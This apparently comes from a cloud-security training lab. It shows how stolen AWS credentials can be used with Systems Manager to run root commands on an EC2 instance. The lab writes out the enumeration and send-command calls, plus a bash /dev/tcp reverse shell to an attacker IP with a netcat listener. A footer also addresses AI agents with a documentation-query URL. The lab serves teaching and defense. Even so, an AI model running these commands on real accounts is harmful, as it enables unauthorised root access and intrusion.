# AWS EC2 Reverse Shell via SSM ## Introduction AWS Systems Manager (SSM) is a capability within AWS that allows administrators to manage resources using the AWS CLI or Console by interacting with an agent running on these resources. We can use SSM to execute commands, connect via the SSH console in the UI, deploy updates, take backups and other administrative tasks. As an attacker, we can (ab)use SSM to gain a reverse shell to our `compute-target` so that we can inspect the file system and have access to the network that it can see. ## What are we going to cover? We will use the stolen credentials from the previous chapter and execute a shell script on the `compute-target`. This shell script will give us shell execution capabilities via a reverse shell that will connect back to our attacker machine. ## Executing commands on the target We will now try to run a command on the `compute-target` EC2 instance within the environment using AWS SSM service accessed via the stolen credentials. Let us enumerate the instances that have the AWS SSM service running using the below command. ``` aws ssm describe-instance-information --profile stolencreds ``` ![describe instance information](/files/VPRuSonH0gfb3KBSLNmY) Note the instance ID of the machine which we will use to perform command execution using SSM. Using the `instanceid` from the `describe-instance-information` above, run the following commands * The AWS SSM `send-command` to send a command to the AWS instance and retrieve the command ID to read the output of the command. ``` aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds ``` ![ssm ifconfig](/files/MT9rrwKt9WjLbNvJB3Jb) * Next, use the AWS SSM `list-command-invocations` to read the output of `ifconfig` using the command ID. ``` aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds ``` ![ssm command output](/files/McPdSUrphVbf43eyBRYV) Remember, AWS SSM agent runs as root/administrator on the EC2 instance, therefore, any command that you run through AWS SSM will execute with administrative privileges. ## Reverse shell using inline script As we can use SSM to execute commands, we can use it to obtain a shell on the remote system. Using the `AWS-RunRemoteScript` document we can execute a script hosted either on Github or an S3 bucket. **Run these commands from the student machine** * **On the attacker machine**, via an SSH terminal, run the below command to make an iptable rule to allow traffic to port 9999 ``` sudo iptables -I INPUT -p tcp -m tcp --dport 9999 -j ACCEPT ``` * **On the attacker machine** where you will catch the reverse shell, start `netcat` using the below command ``` nc -nlvp 9999 ``` * **Back on the student machine**, run the following command, replacing the `ATTACKER-INTERNAL-IP` with the private IP address of the attacker machine and `INSTANCE-ID` with that of the target. The attacker machine and the compute target can both talk to each other as they are in the same VPC. ``` aws ssm send-command --instance-ids "INSTANCE-ID" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters 'commands="bash -c \"bash -i >& /dev/tcp/ATTACKER-INTERNAL-IP/9999 0>&1\""' --output text --query "Command.CommandId" ``` * A reverse shell will have connected to the `netcat` listener ![reverse shell received](/files/qmr8zFvs2jk35ZSa0Ruc) ## Additional references * [Reference for the send-command](https://docs.aws.amazon.com/cli/latest/reference/ssm/send-command.html) * [Running Scripts from Amazon S3](https://docs.aws.amazon.com/systems-manager/latest/userguide/integration-s3.html) * [Remotely Run Commands on an EC2 Instance with AWS Systems Manager](https://aws.amazon.com/getting-started/hands-on/remotely-run-commands-ec2-instance-systems-manager/) * [Getting shell and data access in AWS by chaining vulnerabilities](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xcriminal.gitbook.io/about-me/cloudsec/cloud-compute-with-aws/cloud-compute/aws-ec2-recovery-reverse-shell-via-ssm.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.